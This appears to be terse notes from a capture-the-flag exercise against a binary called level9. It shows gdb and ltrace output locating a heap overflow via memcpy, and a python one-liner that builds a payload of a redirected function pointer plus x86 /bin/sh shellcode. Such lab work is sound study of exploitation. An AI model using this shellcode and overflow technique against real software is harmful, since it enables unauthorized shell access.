
python -c "print('a' * 108 ) + 'AABB'" > /tmp/sol9

gdb -ex "set disassembly-flavor intel" -ex run --args ./level9 $(cat /tmp/sol9)
  :info registers
  ->  eax            0x42424141       1111638337
  :disassemble
    => 0x08048682 <+142>:   mov    edx,DWORD PTR [eax]
    ....
    0x08048693 <+159>:   call   edx


ltrace ./level9 $(cat /tmp/sol9)
  memcpy(0x0804a00c, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 112)  = 0x0804a00c



"""
sol = [ shellcode's address | SHELLCODE | padding | memcpy's return address ]

$eax = memcpy's return address
$edx = [$eax] = shellcode's address = memcpy's return address + 4

SHELLCODE + padding = 108
"""



python -c "print('\x10\xa0\x04\x08' + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'  + 'a' * 79) + '\x0c\xa0\x04\x08'" > /tmp/sol9
